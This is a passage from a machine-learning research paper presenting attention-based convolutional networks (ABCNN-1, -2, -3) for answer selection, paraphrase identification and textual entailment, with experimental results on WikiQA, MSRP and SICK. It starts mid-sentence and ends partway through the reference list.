on attention in deep learning (DL) mostly addresses long short-term memory networks (LSTMs) (Hochreiter and Schmidhuber, 1997). LSTMs achieve attention usually in a word-to-word scheme, and word representations mostly encode the whole context within the sentence (Bahdanau et al., 2015; Rocktäschel et al., 2016). It is not clear whether this is the best strategy; e.g., in the AS ex- ample in Figure 1, it is possible to determine that “how much” in s0 matches “$161.5 million” in s1 without taking the entire sentence contexts into ac- count. This observation was also investigated by Yao et al. (2013b) where an information retrieval system retrieves sentences with tokens labeled as DATE by named entity recognition or as CD by POS tagging if there is a “when” question. However, la- bels or POS tags require extra tools. CNNs benefit from incorporating attention into representations of local phrases detected by filters; in contrast, LSTMs encode the whole context to form attention-based word representations – a strategy that is more com- plex than the CNN strategy and (as our experiments suggest) performs less well for some tasks. Apart from these differences, it is clear that atten- tion has as much potential for CNNs as it does for LSTMs. As far as we know, this is the first NLP paper that incorporates attention into CNNs. Our ABCNNs get state-of-the-art in AS and TE tasks, and competitive performance in PI, then obtains fur- ther improvements over all three tasks when linguis- tic features are used. 2 Related Work Non-DL on Sentence Pair Modeling. Sentence pair modeling has attracted lots of attention in the past decades. Many tasks can be reduced to a se- mantic text matching problem. In this paper, we adopt the arguments by Yih et al. (2013) who ar- gue against shallow approaches as well as against semantic text matching approaches that can be com- putationally expensive: Due to the variety of word choices and inherent ambiguities in natural lan- guage, bag-of-word approaches with sim- ple surface-form word matching tend to produce brittle results with poor predic- tion accuracy (Bilotti et al., 2007). As a result, researchers put more emphasis on exploiting syntactic and semantic struc- ture. Representative examples include methods based on deeper semantic anal- ysis (Shen and Lapata, 2007; Moldovan et al., 2007), tree edit-distance (Punyakanok et al., 2004; Heilman and Smith, 2010) and quasi-synchronous grammars (Wang et al., 2007) that match the dependency parse trees of the two sentences. Instead of focusing on the high-level semantic rep- resentation, Yih et al. (2013) turn their attention to improving the shallow semantic component, lexical semantics, by performing semantic matching based on a latent word-alignment structure (cf. Chang et al. (2010)). Lai and Hockenmaier (2014) explore finer- grained word overlap and alignment between two sentences using negation, hypernym, synonym and antonym relations. Yao et al. (2013a) extend word- to-word alignment to phrase-to-phrase alignment by a semi-Markov CRF. However, such approaches of- ten require more computational resources. In ad- dition, employing syntactic or semantic parsers – which produce errors on many sentences – to find the best match between the structured representa- tions of two sentences is not trivial. DL on Sentence Pair Modeling. To address some of the challenges of non-DL work, much re- cent work uses neural networks to model sentence pairs for AS, PI and TE. For AS, Yu et al. (2014) present a bigram CNN to model question and answer candidates. Yang et al. (2015) extend this method and get state-of-the-art performance on the WikiQA dataset (Section 5.1). Feng et al. (2015) test various setups of a bi-CNN ar- chitecture on an insurance domain QA dataset. Tan et al. (2016) explore bidirectional LSTMs on the same dataset. Our approach is different because we do not model the sentences by two independent neu- ral networks in parallel, but instead as an interdepen- dent sentence pair, using attention. For PI, Blacoe and Lapata (2012) form sentence representations by summing up word embeddings. Socher et al. (2011) use recursive autoencoders (RAEs) to model representations of local phrases in sentences, then pool similarity values of phrases from the two sentences as features for binary classi- fication. Yin and Schütze (2015a) similarly replace an RAE with a CNN. In all three papers, the rep- resentation of one sentence is not influenced by the other – in contrast to our attention-based model. For TE, Bowman et al. (2015b) use recursive neu- ral networks to encode entailment on SICK (Marelli et al., 2014b). Rocktäschel et al. (2016) present an attention-based LSTM for the Stanford natural lan- guage inference corpus (Bowman et al., 2015a). Our system is the first CNN-based work on TE. Some prior work aims to solve a general sen- tence matching problem. Hu et al. (2014) present two CNN architectures, ARC-I and ARC-II, for sen- tence matching. ARC-I focuses on sentence repre- sentation learning while ARC-II focuses on match- ing features on phrase level. Both systems were tested on PI, sentence completion (SC) and tweet- response matching. Yin and Schütze (2015b) pro- pose the MultiGranCNN architecture to model gen- eral sentence matching based on phrase matching on multiple levels of granularity and get promising re- sults for PI and SC. Wan et al. (2016) try to match two sentences in AS and SC by multiple sentence representations, each coming from the local repre- sentations of two LSTMs. Our work is the first one to investigate attention for the general sentence matching task. Attention-Based DL in Non-NLP Domains. Even though there is little if any work on atten- tion mechanisms in CNNs for NLP, attention-based CNNs have been used in computer vision for visual question answering (Chen et al., 2015), image clas- sification (Xiao et al., 2015), caption generation (Xu et al., 2015), image segmentation (Hong et al., 2016) and object localization (Cao et al., 2015). Mnih et al. (2014) apply attention in recurrent neural networks (RNNs) to extract “information from an image or video by adaptively selecting a sequence of regions or locations and only process- ing the selected regions at high resolution.” Gre- gor et al. (2015) combine a spatial attention mech- anism with RNNs for image generation. Ba et al. (2015) investigate attention-based RNNs for recog- nizing multiple objects in images. Chorowski et al. (2014) and Chorowski et al. (2015) use attention in RNNs for speech recognition. Attention-Based DL in NLP. Attention-based DL systems have been applied to NLP after their success in computer vision and speech recognition. They mainly rely on RNNs and end-to-end encoder- decoders for tasks such as machine translation (Bah- danau et al., 2015; Luong et al., 2015) and text re- construction (Li et al., 2015; Rush et al., 2015). Our work takes the lead in exploring attention mecha- nisms in CNNs for NLP tasks. 3 BCNN: Basic Bi-CNN We now introduce our basic (non-attention) CNN that is based on the Siamese architecture (Brom- ley et al., 1993), i.e., it consists of two weight- sharing CNNs, each processing one of the two sen- tences, and a final layer that solves the sentence pair task. See Figure 2. We refer to this architecture as the BCNN. The next section will then introduce the ABCNN, an attention architecture that extends the BCNN. Table 1 gives our notational conventions. In our implementation and also in the mathemat- ical formalization of the model given below, we pad the two sentences to have the same length s = max(s0, s1). However, in the figures we show dif- ferent lengths because this gives a better intuition of how the model works. We now describe the BCNN’s four types of lay- ers: input, convolution, average pooling and output. symbol description s, s0, s1 sentence or sentence length v word w filter width di dimensionality of input to layer i + 1 W weight matrix Table 1: Notation Figure 2: BCNN: ABCNN without Attention Input layer. In the example in the figure, the two input sentences have 5 and 7 words, respectively. Each word is represented as a d0-dimensional pre- computed word2vec (Mikolov et al., 2013) embed- ding, d0 = 300. As a result, each sentence is repre- sented as a feature map of dimension d0 ×s. Convolution layer. Let v1, v2, . . . , vs be the words of a sentence and ci ∈ Rw·d0 , 0 < i < s + w, the concatenated embeddings of vi−w+1, . . . , vi where embeddings for vj are set to zero when j < 1 or j > s. We then generate the representation pi ∈ Rd1 for the phrase vi−w+1, . . . , vi using the convolution weights W ∈ Rd1×wd0 as follows: pi = tanh(W ·ci + b) where b ∈ Rd1 is the bias. Average pooling layer. Pooling (including min, max, average pooling) is commonly used to extract robust features from convolution. In this paper, we introduce attention weighting as an alternative, but use average pooling as a baseline as follows. For the output feature map of the last convolu- tion layer, we do column-wise averaging over all columns, denoted as all-ap. This generates a rep- resentation vector for each of the two sentences, shown as the top “Average pooling (all-ap)” layer below “Logistic regression” in Figure 2. These two vectors are the basis for the sentence pair decision. For the output feature map of non-final convolu- tion layers, we do column-wise averaging over win- dows of w consecutive columns, denoted as w-ap; shown as the lower “Average pooling (w-ap)” layer in Figure 2. For filter width w, a convolution layer transforms an input feature map of s columns into a new feature map of s + w − 1 columns; average pooling transforms this back to s columns. This ar- chitecture supports stacking an arbitrary number of convolution-pooling blocks to extract increasingly abstract features. Input features to the bottom layer are words, input features to the next layer are short phrases and so on. Each level generates more ab- stract features of higher granularity. The last layer is an output layer, chosen accord- ing to the task; e.g., for binary classification tasks, this layer is logistic regression (see Figure 2). Other types of output layers are introduced below. We found that in most cases, performance is boosted if we provide the output of all pooling lay- ers as input to the output layer. For each non-final average pooling layer, we perform w-ap (pooling over windows of w columns) as described above, but we also perform all-ap (pooling over all columns) and forward the result to the output layer. This improves performance because representations from different layers cover the properties of the sentences at different levels of abstraction and all of these lev- els can be important for a particular sentence pair. 4 ABCNN: Attention-Based BCNN We now describe three architectures based on the BCNN, the ABCNN-1, the ABCNN-2 and the ABCNN-3, that each introduces an attention mech- anism for modeling sentence pairs; see Figure 3. ABCNN-1. The ABCNN-1 (Figure 3(a)) em- ploys an attention feature matrix A to influence con- (a) One block in ABCNN-1 (b) One block in ABCNN-2 (c) One block in ABCNN-3 Figure 3: Three ABCNN architectures volution. Attention features are intended to weight those units of si more highly in convolution that are relevant to a unit of s1−i (i ∈ {0, 1}); we use the term “unit” here to refer to words on the lowest level and to phrases on higher levels of the network. Fig- ure 3(a) shows two unit representation feature maps in red: this part of the ABCNN-1 is the same as in the BCNN (see Figure 2). Each column is the representation of a unit, a word on the lowest level and a phrase on higher levels. We first describe the attention feature matrix A informally (layer “Conv input”, middle column, in Figure 3(a)). A is gener- ated by matching units of the left representation fea- ture map with units of the right representation fea- ture map such that the attention values of row i in A denote the attention distribution of the i-th unit of s0 with respect to s1, and the attention values of col- umn j in A denote the attention distribution of the j-th unit of s1 with respect to s0. A can be viewed as a new feature map of s0 (resp. s1) in row (resp. col- umn) direction because each row (resp. column) is a new feature vector of a unit in s0 (resp. s1). Thus, it makes sense to combine this new feature map with the representation feature maps and use both as in- put to the convolution operation. We achieve this by transforming A into the two blue matrices in Figure 3(a) that have the same format as the representation feature maps. As a result, the new input of convolu- tion has two feature maps for each sentence (shown in red and blue). Our motivation is that the atten- tion feature map will guide the convolution to learn “counterpart-biased” sentence representations. More formally, let Fi,r ∈ Rd×s be the represen- tation feature map of sentence i (i ∈ {0, 1}). Then we define the attention matrix A ∈ Rs×s as follows: Ai,j = match-score(F0,r[:, i], F1,r[:, j]) (1) The function match-score can be defined in a variety of ways. We found that 1/(1 + |x − y|) works well where | · | is Euclidean distance. Given attention matrix A, we generate the atten- tion feature map Fi,a for si as follows: F0,a = W0 ·A>, F1,a = W1 ·A The weight matrices W0 ∈ Rd×s, W1 ∈ Rd×s are parameters of the model to be learned in training.1 1The weights of the two matrices are shared in our imple- mentation to reduce the number of parameters of the model. We stack the representation feature map Fi,r and the attention feature map Fi,a as an order 3 tensor and feed it into convolution to generate a higher- level representation feature map for si (i ∈ {0, 1}). In Figure 3(a), s0 has 5 units, s1 has 7. The output of convolution (shown in the top layer, filter width w = 3) is a higher-level representation feature map with 7 columns for s0 and 9 columns for s1. ABCNN-2. The ABCNN-1 computes attention weights directly on the input representation with the aim of improving the features computed by convolu- tion. The ABCNN-2 (Figure 3(b)) instead computes attention weights on the output of convolution with the aim of reweighting this convolution output. In the example shown in Figure 3(b), the feature maps output by convolution for s0 and s1 (layer marked “Convolution” in Figure 3(b)) have 7 and 9 columns, respectively; each column is the representation of a unit. The attention matrix A compares all units in s0 with all units of s1. We sum all attention values for a unit to derive a single attention weight for that unit. This corresponds to summing all values in a row of A for s0 (“col-wise sum”, resulting in the column vector of size 7 shown) and summing all values in a column for s1 (“row-wise sum”, resulting in the row vector of size 9 shown). More formally, let A ∈ Rs×s be the attention matrix, a0,j = ∑ A[j, :] the attention weight of unit j in s0, a1,j = ∑ A[:, j] the attention weight of unit j in s1 and Fci,r ∈ R d×(si+w−1) the output of convolution for si. Then the j-th column of the new feature map Fpi,r generated by w-ap is derived by: F p i,r[:, j]= ∑ k=j:j+w ai,kF c i,r[:, k], j = 1 . . . si Note that Fpi,r ∈ R d×si , i.e., ABCNN-2 pooling generates an output feature map of the same size as the input feature map of convolution. This allows us to stack multiple convolution-pooling blocks to extract features of increasing abstraction. There are three main differences between the ABCNN-1 and the ABCNN-2. (i) Attention in the ABCNN-1 impacts convolution indirectly while at- tention in the ABCNN-2 influences pooling through direct attention weighting. (ii) The ABCNN-1 re- quires the two matrices Wi to convert the attention matrix into attention feature maps; and the input to convolution has two times as many feature maps. Thus, the ABCNN-1 has more parameters than the ABCNN-2 and is more vulnerable to overfitting. (iii) As pooling is performed after convolution, pool- ing handles larger-granularity units than convolu- tion; e.g., if the input to convolution has word level granularity, then the input to pooling has phrase level granularity, the phrase size being equal to filter size w. Thus, the ABCNN-1 and the ABCNN-2 imple- ment attention mechanisms for linguistic units of different granularity. The complementarity of the ABCNN-1 and the ABCNN-2 motivates us to pro- pose the ABCNN-3, a third architecture that com- bines elements of the two. ABCNN-3 (Figure 3(c)) combines the ABCNN-1 and the ABCNN-2 by stacking them; it combines the strengths of the ABCNN-1 and -2 by allowing the attention mechanism to operate (i) both on the con- volution and on the pooling parts of a convolution- pooling block and (ii) both on the input granularity and on the more abstract output granularity. 5 Experiments We test the proposed architectures on three tasks: answer selection (AS), paraphrase identification (PI) and textual entailment (TE). Common Training Setup. Words are initialized by 300-dimensional word2vec embeddings and not changed during training. A single randomly initial- ized embedding is created for all unknown words by uniform sampling from [-.01,.01]. We employ Ada- grad (Duchi et al., 2011) and L2 regularization. Network Configuration. Each network in the experiments below consists of (i) an initialization block b1 that initializes words by word2vec em- beddings, (ii) a stack of k − 1 convolution-pooling blocks b2, . . . , bk, computing increasingly abstract features, and (iii) one final LR layer (logistic regres- sion layer) as shown in Figure 2. The input to the LR layer consists of kn features – each block provides n similarity scores, e.g., n cosine similarity scores. Figure 2 shows the two sentence vectors output by the final block bk of the stack (“sentence representation 0”, “sentence repre- sentation 1”); this is the basis of the last n similarity scores. As we explained in the final paragraph of Section 3, we perform all-ap pooling for all blocks, AS PI TE #C L lr w L2 lr w L2 lr w L2 ABCNN-1 1 .08 4 .0004 .08 3 .0002 .08 3 .0006 ABCNN-1 2 .085 4 .0006 .085 3 .0003 .085 3 .0006 ABCNN-2 1 .05 4 .0003 .085 3 .0001 .09 3 .00065 ABCNN-2 2 .06 4 .0006 .085 3 .0001 .085 3 .0007 ABCNN-3 1 .05 4 .0003 .05 3 .0003 .09 3 .0007 ABCNN-3 2 .06 4 .0006 .055 3 .0005 .09 3 .0007 Table 2: Hyperparameters. lr: learning rate. #CL: num- ber convolution layers. w: filter width. The number of convolution kernels di (i > 0) is 50 throughout. not just for bk. Thus we get one sentence representa- tion each for s0 and s1 for each block b1, . . . , bk. We compute n similarity scores for each block (based on the block’s two sentence representations). Thus, we compute a total of kn similarity scores and these scores are input to the LR layer. Depending on the task, we use different methods for computing the similarity score: see below. Layerwise Training. In our training regime, we first train a network consisting of just one convolution-pooling block b2. We then create a new network by adding a block b3, initialize its b2 block with the previously learned weights for b2 and train b3 keeping the previously learned weights for b2 fixed. We repeat this procedure until all k − 1 convolution-pooling blocks are trained. We found that this training regime gives us good performance and shortens training times considerably. Since sim- ilarity scores of lower blocks are kept unchanged once they have been learned, this also has the nice effect that “simple” similarity scores (those based on surface features) are learned first and subsequent training phases can focus on complementary scores derived from more complex abstract features. Classifier. We found that performance increases if we do not use the output of the LR layer as the final decision, but instead train a linear SVM or a logistic regression with default parameters2 directly on the input to the LR layer (i.e., on the kn similarity scores that are generated by the k-block stack after network training is completed). Direct training of SVMs/LR seems to get closer to the global optimum than gradient descent training of CNNs. Table 2 shows hyperparameters, tuned on dev. We use addition and LSTMs as two shared base- lines for all three tasks, i.e., for AS, PI and TE. We 2 http://scikit-learn.org/stable/ for both. http://scikit-learn.org/stable/ now describe these two shared baselines. (i) Addition. We sum up word embeddings element-wise to form each sentence representation. The classifier input is then the concatenation of the two sentence representations. (ii) A-LSTM. Be- fore this work, most attention mechanisms in NLP were implemented in recurrent neural networks for text generation tasks such as machine translation (e.g., Bahdanau et al. (2015), Luong et al. (2015)). Rocktäschel et al. (2016) present an attention-LSTM for natural language inference. Since this model is the pioneering attention based RNN system for sen- tence pair classification, we consider it as a baseline system (“A-LSTM”) for all our three tasks. The A- LSTM has the same configuration as our ABCNNs in terms of word initialization (300-dimensional word2vec embeddings) and the dimensionality of all hidden layers (50). 5.1 Answer Selection We use WikiQA,3 an open domain question-answer dataset. We use the subtask that assumes that there is at least one correct answer for a question. The corresponding dataset consists of 20,360 question- candidate pairs in train, 1,130 pairs in dev and 2,352 pairs in test where we adopt the standard setup of only considering questions with correct answers in test. Following Yang et al. (2015), we truncate an- swers to 40 tokens. The task is to rank the candidate answers based on their relatedness to the question. Evaluation mea- sures are mean average precision (MAP) and mean reciprocal rank (MRR). Task-Specific Setup. We use cosine similarity as the similarity score for AS. In addition, we use sen- tence lengths, WordCnt (count of the number of non- stopwords in the question that also occur in the an- swer) and WgtWordCnt (reweight the counts by the IDF values of the question words). Thus, the final input to the LR layer has size k + 4: one cosine for each of the k blocks and the four additional features. We compare with seven baselines. The first three are considered by Yang et al. (2015): (i) WordCnt; (ii) WgtWordCnt; (iii) CNN-Cnt (the state-of-the- art system): combine CNN with (i) and (ii). Apart from the baselines considered by Yang et al. (2015), 3http://aka.ms/WikiQA (Yang et al., 2015) method MAP MRR B as el in es WordCnt 0.4891 0.4924 WgtWordCnt 0.5099 0.5132 CNN-Cnt 0.6520 0.6652 Addition 0.5021 0.5069 Addition(+) 0.5888 0.5929 A-LSTM 0.5347 0.5483 A-LSTM(+) 0.6381 0.6537 BCNN one-conv 0.6629 0.6813 two-conv 0.6593 0.6738 ABCNN-1 one-conv 0.6810∗ 0.6979∗ two-conv 0.6855∗ 0.7023∗ ABCNN-2 one-conv 0.6885∗ 0.7054∗ two-conv 0.6879∗ 0.7068∗ ABCNN-3 one-conv 0.6914∗ 0.7127∗ two-conv 0.6921∗ 0.7108∗ Table 3: Results on WikiQA. Best result per column is bold. Significant improvements over state-of-the-art baselines (underlined) are marked with ∗ (t-test, p < .05). we compare with two Addition baselines and two LSTM baselines. Addition and A-LSTM are the shared baselines described before. We also combine both with the four extra features; this gives us two additional baselines that we refer to as Addition(+) and A-LSTM(+). Results. Table 3 shows performance of the base- lines, of the BCNN and of the three ABCNNs. For CNNs, we test one (one-conv) and two (two-conv) convolution-pooling blocks. The non-attention network BCNN already per- forms better than the baselines. If we add attention mechanisms, then the performance further improves by several points. Comparing the ABCNN-2 with the ABCNN-1, we find the ABCNN-2 is slightly better even though the ABCNN-2 is the simpler ar- chitecture. If we combine the ABCNN-1 and the ABCNN-2 to form the ABCNN-3, we get further improvement.4 This can be explained by the ABCNN-3’s abil- ity to take attention of finer-grained granularity into consideration in each convolution-pooling block while the ABCNN-1 and the ABCNN-2 consider at- tention only at convolution input or only at pooling input, respectively. We also find that stacking two convolution-pooling blocks does not bring consis- tent improvement and therefore do not test deeper architectures. 4If we limit the input to the LR layer to the k similarity scores in the ABCNN-3 (two-conv), results are .660 (MAP) / .677 (MRR). http://aka.ms/WikiQA 5.2 Paraphrase Identification We use the Microsoft Research Paraphrase (MSRP) corpus (Dolan et al., 2004). The training set contains 2753 true / 1323 false and the test set 1147 true / 578 false paraphrase pairs. We randomly select 400 pairs from train and use them as dev; but we still report results for training on the entire training set. For each triple (label, s0, s1) in the training set, we also add (label, s1, s0) to the training set to make best use of the training data. Systems are evaluated by accuracy and F1. Task-Specific Setup. In this task, we add the 15 MT features from (Madnani et al., 2012) and the lengths of the two sentences. In addition, we compute ROUGE-1, ROUGE-2 and ROUGE-SU4 (Lin, 2004), which are scores measuring the match between the two sentences on (i) unigrams, (ii) bi- grams and (iii) unigrams and skip-bigrams (maxi- mum skip distance of four), respectively. In this task, we found transforming Euclidean distance into similarity score by 1/(1 + |x − y|) performs better than cosine similarity. Additionally, we use dynamic pooling (Yin and Schütze, 2015a) of the attention matrix A in Equation (1) and forward pooled val- ues of all blocks to the classifier. This gives us bet- ter performance than only forwarding sentence-level matching features. We compare our system with representative DL approaches: (i) A-LSTM; (ii) A-LSTM(+): A- LSTM plus handcrafted features; (iii) RAE (Socher et al., 2011), recursive autoencoder; (iv) Bi-CNN- MI (Yin and Schütze, 2015a), a bi-CNN architec- ture; and (v) MPSSM-CNN (He et al., 2015), the state-of-the-art NN system for PI, and the follow- ing four non-DL systems: (vi) Addition; (vii) Ad- dition(+): Addition plus handcrafted features; (viii) MT (Madnani et al., 2012), a system that combines machine translation metrics;5 (ix) MF-TF-KLD (Ji and Eisenstein, 2013), the state-of-the-art non-NN system. Results. Table 4 shows that the BCNN is slightly worse than the state-of-the-art whereas the ABCNN- 1 roughly matches it. The ABCNN-2 is slightly above the state-of-the-art. The ABCNN-3 outper- 5For better comparability of approaches in our experiments, we use a simple SVM classifier, which performs slightly worse than Madnani et al. (2012)’s more complex meta-classifier. method acc F1 B as el in es majority voting 66.5 79.9 RAE 76.8 83.6 Bi-CNN-MI 78.4 84.6 MPSSM-CNN 78.6 84.7 MT 76.8 83.8 MF-TF-KLD 78.6 84.6 Addition 70.8 80.9 Addition (+) 77.3 84.1 A-LSTM 69.5 80.1 A-LSTM (+) 77.1 84.0 BCNN one-conv 78.1 84.1 two-conv 78.3 84.3 ABCNN-1 one-conv 78.5 84.5 two-conv 78.5 84.6 ABCNN-2 one-conv 78.6 84.7 two-conv 78.8 84.7 ABCNN-3 one-conv 78.8 84.8 two-conv 78.9 84.8 Table 4: Results for PI on MSRP forms the state-of-the-art in accuracy and F1.6 Two convolution layers only bring small improvements over one. 5.3 Textual Entailment SemEval 2014 Task 1 (Marelli et al., 2014a) eval- uates system predictions of textual entailment (TE) relations on sentence pairs from the SICK dataset (Marelli et al., 2014b). The three classes are entail- ment, contradiction and neutral. The sizes of SICK train, dev and test sets are 4439, 495 and 4906 pairs, respectively. We call this dataset ORIG. We also create NONOVER, a copy of ORIG in which words occurring in both sentences are re- moved. A sentence in NONOVER is denoted by the special token <empty> if all words are removed. Table 5 shows three pairs from ORIG and their trans- formation in NONOVER. We observe that focusing on the non-overlapping parts provides clearer hints for TE than ORIG. In this task, we run two copies of each network, one for ORIG, one for NONOVER; these two networks have a single common LR layer. Like Lai and Hockenmaier (2014), we train our final system (after fixing hyperparameters) on train and dev (4934 pairs). Eval measure is accuracy. Task-Specific Setup. We found that for this task forwarding two similarity scores from each block 6Improvement of .3 (acc) and .1 (F1) over state-of-the-art is not significant. The ABCNN-3 (two-conv) without “linguistic” features (i.e., MT and ROUGE) achieves 75.1/82.7. ORIG NONOVER 0 children in red shirts are children red shirts playing in the leaves playing three kids are sitting in the leaves three kids sitting 1 three boys are jumping in the leaves boys three kids are jumping in the leaves kids 2 a man is jumping into an empty pool an empty a man is jumping into a full pool a full Table 5: SICK data: Converting the original sentences (ORIG) into the NONOVER format (instead of just one) is helpful. We use cosine sim- ilarity and Euclidean distance. As we did for para- phrase identification, we add the 15 MT features for each sentence pair for this task as well; our motiva- tion is that entailed sentences resemble paraphrases more than contradictory sentences do. We use the following linguistic features. Nega- tion is important for detecting contradiction. Fea- ture NEG is set to 1 if either sentence contains “no”, “not”, “nobody”, “isn’t” and to 0 otherwise. Fol- lowing Lai and Hockenmaier (2014), we use Word- Net (Miller, 1995) to detect nyms: synonyms, hy- pernyms and antonyms in the pairs. But we do this on NONOVER (not on ORIG) to focus on what is critical for TE. Specifically, feature SYN is the number of word pairs in s0 and s1 that are syn- onyms. HYP0 (resp. HYP1) is the number of words in s0 (resp. s1) that have a hypernym in s1 (resp. s0). In addition, we collect all potential antonym pairs (PAP) in NONOVER. We identify the matched chunks that occur in contradictory and neutral, but not in entailed pairs. We exclude synonyms and hy- pernyms and apply a frequency filter of n = 2. In contrast to Lai and Hockenmaier (2014), we con- strain the PAP pairs to cosine similarity above 0.4 in word2vec embedding space as this discards many noise pairs. Feature ANT is the number of matched PAP antonyms in a sentence pair. As before we use sentence lengths, both for ORIG (LEN0O: length s0, LEN1O: length s1) and for NONOVER (LEN0N: length s0, LEN1N: length s1). On the whole, we have 24 extra features: 15 MT metrics, NEG, SYN, HYP0, HYP1, ANT, LEN0O, LEN1O, LEN0N and LEN1N. Apart from the Addition and LSTM baselines, we further compare with the top-3 systems in SemEval and TrRNTN (Bowman et al., 2015b), a recursive neural network developed for this SICK task. method acc S em - E va l To p3 (Jimenez et al., 2014) 83.1 (Zhao et al., 2014) 83.6 (Lai and Hockenmaier, 2014) 84.6 TrRNTN (Bowman et al., 2015b) 76.9 Addition no features 73.1 plus features 79.4 A-LSTM no features 78.0 plus features 81.7 BCNN one-conv 84.8 two-conv 85.0 ABCNN-1 one-conv 85.6 two-conv 85.8 ABCNN-2 one-conv 85.7 two-conv 85.8 ABCNN-3 one-conv 86.0∗ two-conv 86.2∗ Table 6: Results on SICK. Significant improvements over (Lai and Hockenmaier, 2014) are marked with ∗ (test of equal proportions, p < .05). Results. Table 6 shows that our CNNs outper- form A-LSTM (with or without linguistic features added) and the top three SemEval systems. Compar- ing ABCNNs with the BCNN, attention mechanisms consistently improve performance. The ABCNN-1 has performance comparable to the ABCNN-2 while the ABCNN-3 is better still: a boost of 1.6 points compared to the previous state of the art.7 Visual Analysis. Figure 4 visualizes the attention matrices for one TE sentence pair in the ABCNN- 2 for blocks b1 (unigrams), b2 (first convolutional layer) and b3 (second convolutional layer). Darker shades of blue indicate stronger attention values. In Figure 4 (top), each word corresponds to ex- actly one row or column. We can see that words in si with semantic equivalents in s1−i get high atten- tion while words without semantic equivalents get low attention, e.g., “walking” and “murals” in s0 and “front” and “colorful” in s1. This behavior seems reasonable for the unigram level. Rows/columns of the attention matrix in Figure 4 (middle) correspond to phrases of length three since filter width w = 3. High attention values generally correlate with close semantic correspondence: the phrase “people are” in s0 matches “several people are” in s1; both “are walking outside” and “walking outside the” in s0 match “are in front” in s1; “the building that” in s0 matches “a colorful building” in 7If we run the ABCNN-3 (two-conv) without the 24 linguis- tic features, performance is 84.6. several people are in front of a colorful building people are walking outside the building that has several murals on it se ve ra l se ve ra l p eo pl e se ve ra l p eo pl e ar e p eo pl e ar e in ar e in fr on t in fr on t o f fr on t o f a of a c ol or fu l a co rlo rf ul b ui ld in g co rlo rf ul b ui ld in g bu ild in g people people are people are walking are walking outside walking outside the outside the building the building that building that has that has several has several murals several murals on murals on it on it it se ve ra l se ve ra l p eo pl e se ve ra l.. .a re se ve ra l.. .in se ve ra l.. .fr on t pe op le ... of ar e. ..a in ... co lo rf ul fr on t.. .b ui ld in g of ... bu ild in g a. ..b ui ld in g people people are people...walking people...outside people...the are...building walking...that outside...has the...several building...murals that...on has...it several...it murals...it Figure 4: Attention visualization for TE. Top: unigrams, b1. Middle: conv1, b2. Bottom: conv2, b3. s1. More interestingly, looking at the bottom right corner, both “on it” and “it” in s0 match “building” in s1; this indicates that ABCNNs are able to detect some coreference across sentences. “building” in s1 has two places in which higher attentions appear, one is with “it” in s0, the other is with “the building that” in s0. This may indicate that ABCNNs recog- nize that “building” in s1 and “the building that” / “it” in s0 refer to the same object. Hence, corefer- ence resolution across sentences as well as within a sentence both are detected. For the attention vectors on the left and the top, we can see that attention has focused on the key parts: “people are walking out- side the building that” in s0, “several people are in” and “of a colorful building” in s1. Rows/columns of the attention matrix in Figure 4 (bottom, second layer of convolution) correspond to phrases of length 5 since filter width w = 3 in both convolution layers (5 = 1 + 2 ∗ (3 − 1)). We use “. . .” to denote words in the middle if a phrase like “several...front” has more than two words. We can see that attention distribution in the matrix has focused on some local regions. As granularity of phrases is larger, it makes sense that the attention values are smoother. But we still can find some interesting clues: at the two ends of the main di- agonal, higher attentions hint that the first part of s0 matches well with the first part of s1; “several murals on it” in s0 matches well with “of a color- ful building” in s1, which satisfies the intuition that these two phrases are crucial for making a decision on TE in this case. This again shows the potential strength of our system in figuring out which parts of the two sentences refer to the same object. In ad- dition, in the central part of the matrix, we can see that the long phrase “people are walking outside the building” in s0 matches well with the long phrase “are in front of a colorful building” in s1. 6 Summary We presented three mechanisms to integrate atten- tion into CNNs for general sentence pair modeling tasks. Our experiments on AS, PI and TE show that attention-based CNNs perform better than CNNs without attention mechanisms. The ABCNN-2 gen- erally outperforms the ABCNN-1 and the ABCNN- 3 surpasses both. In all tasks, we did not find any big improvement of two layers of convolution over one layer. This is probably due to the limited size of training data. We expect that, as larger training sets become available, deep ABCNNs will show even better performance. In addition, linguistic features contribute in all three tasks: improvements by 0.0321 (MAP) and 0.0338 (MRR) for AS, improvements by 3.8 (acc) and 2.1 (F1) for PI and an improvement by 1.6 (acc) for TE. But our ABCNNs can still reach or surpass state-of-the-art even without those features in AS and TE tasks. This indicates that ABCNNs are gen- erally strong NN systems. Attention-based LSTMs are especially successful in tasks with a strong generation component like ma- chine translation (discussed in Sec. 2). CNNs have not been used for this type of task. This is an inter- esting area of future work for attention-based CNNs. Acknowledgments We gratefully acknowledge the support of Deutsche Forschungsgemeinschaft (DFG): grant SCHU 2246/8-2. We would like to thank the anonymous reviewers for their helpful comments. References Jimmy Ba, Volodymyr Mnih, and Koray Kavukcuoglu. 2015. Multiple object recognition with visual atten- tion. In Proceedings of ICLR. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. In Proceedings of ICLR. Matthew W. Bilotti, Paul Ogilvie, Jamie Callan, and Eric Nyberg. 2007. Structured retrieval for question an- swering. In Proceedings of SIGIR, pages 351–358. William Blacoe and Mirella Lapata. 2012. A comparison of vector-based representations for semantic composi- tion. In Proceedings of EMNLP-CoNLL, pages 546– 556. Samuel R. Bowman, Gabor Angeli, Christopher Potts, and Christopher D. Manning. 2015a. A large anno- tated corpus for learning natural language inference. In Proceedings of EMNLP, pages 632–642. Samuel R. Bowman, Christopher Potts, and Christo- pher D. Manning. 2015b. Recursive neural networks can learn logical semantics. In Proceedings of CVSC Workshop, pages 12–21. Jane Bromley, James W. Bentz, Léon Bottou, Isabelle Guyon, Yann LeCun, Cliff Moore, Eduard Säckinger, and Roopak Shah. 1993. Signature verification us- ing A “siamese” time delay neural network. IJPRAI, 7(4):669–688. Chunshui Cao, Xianming Liu, Yi Yang, Yinan Yu, Jiang Wang, Zilei Wang, Yongzhen Huang, Liang Wang, Chang Huang, Wei Xu, Deva Ramanan, and Thomas S. Huang. 2015. Look and think twice: Cap- turing top-down visual attention with feedback con- volutional neural networks. In Proceedings of ICCV, pages 2956–2964. Ming-Wei Chang, Dan Goldwasser, Dan Roth, and Vivek Srikumar. 2010. Discriminative learning over con- strained latent representations. In Proceedings of NAACL-HLT, pages 429–437. Kan Chen, Jiang Wang, Liang-Chieh Chen, Haoyuan Gao, Wei Xu, and Ram Nevatia. 2015. ABC-CNN: An attention based convolutional neural network for visual question answering. CoRR, abs/1511.05960. Jan Chorowski, Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Bengio. 2014. End-to-end continuous 